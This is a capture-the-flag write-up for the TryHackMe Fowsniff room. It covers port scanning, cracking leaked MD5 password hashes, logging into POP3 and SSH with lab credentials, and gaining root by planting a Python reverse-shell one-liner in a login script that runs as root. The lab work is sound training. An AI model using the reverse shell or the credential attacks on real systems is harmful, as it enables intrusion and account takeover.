Hack this machine and get the flag. There are lots of hints along the way and is perfect for beginners!

This is the write-up for the room Fowsniff CTF on Tryhackme and it is part of our cybersecurity training from HackerU.

This boot2root machine is brilliant for new starters. You will have to enumerate this machine by finding open ports, do some online research (it's amazing how much information Google can find for you), decoding hashes, brute-forcing a pop3 login, and much more!

Firstly we have to make a connection with VPN or use the attack box on the Tryhackme site to connect to the Tryhackme lab environment.

VPN connection with THM

Now will move toward our task. Using Nmap, scan this machine. What ports are open? Before doing a Nmap scan check if we are getting ping from the target system. we were not getting ping this might be due to the ping is blocked in the target system.

nmap -sS -sV -A -Pn 10.10.160.4

(TCP SYN scan)

(Version detection)

(Aggressive scan options)

-Pn (No ping)

Nmap scan

From the scan, we found that there are 4 ports open. port 22, port 80, port 110, port 143.

As port 80 is open will check if we get any information on the webpage.

webpage

from the webpage, we came to know that Fownsniff corp. has been pawned by B1gN1nj4!. so searched for this name on the internet and found a Twitter account.

In THM it was said to google search and see if we can get any public information about them.

On checking the Twitter link got that the email-id and password have been dumped in Pastebin.

user search
Pastebin link

We got the Pastebin link now will check the credentials dumped there.

Pastebin site -credentials

We got the credentials of the user's email here it is in md5 hashes will try to decrypt it using an online search hashkiller was provided by THM to convert the md5 hashes.

some of the credentials we were able to convert.

decrypted md5 hashes

we were asked What was Siena's password to the email service? in THM.

scoobydoo2.

Next was asked to connect to the pop3 service with her credentials? What email information can you gather?

so logged in to the mail server using nc (hint was given).

nc 10.10.160.4 110

pop3 mail login

We logged in to Siena's id and saw 2 emails have been received. Will see for any useful information in it.

first mail

In the first mail found that there is a temporary ssh password. And we got the answer to the question

Looking through her emails, what was a temporary password set for her?’

S1ck3nBluff+secureshell

Now will see the second mail if we get any more information. And was mentioned in THM that the “ In the email, who send it? Using the password from the previous question and the sender's username, connect to the machine using SSH.”

second mail

we found that baksteen was the user who sent it and in previous mail we got the password will try to log in ssh.

ssh login

Once connected, what groups does this user belong to? Are there any interesting files that can be run by that group?

We got the file cube.sh which has sgid permission that any user can edit it which is in the group.

find / -group users -type f 2>/dev/null

cube.sh

And it was mentioned to look into directory /etc/update-motd.d/.

So went to the directory mentioned and searched for information.

cube.sh working

From the 00-header file content, we came to know that the cube.sh file is running at the start when we log in. So we have to edit the file write our python reverse shell script and re-login to get privileged user access as this cube.sh file is run as root.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.4.21.4”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

python script

And opened Netcat listener at port 1234 and will wait to get root shell.

flag.txt

Thus we successfully able to crack the box get privilege escalation and got root access and captured the flag.

Cyber security enthusiast currently learning cybersecurity as RED team From HackerU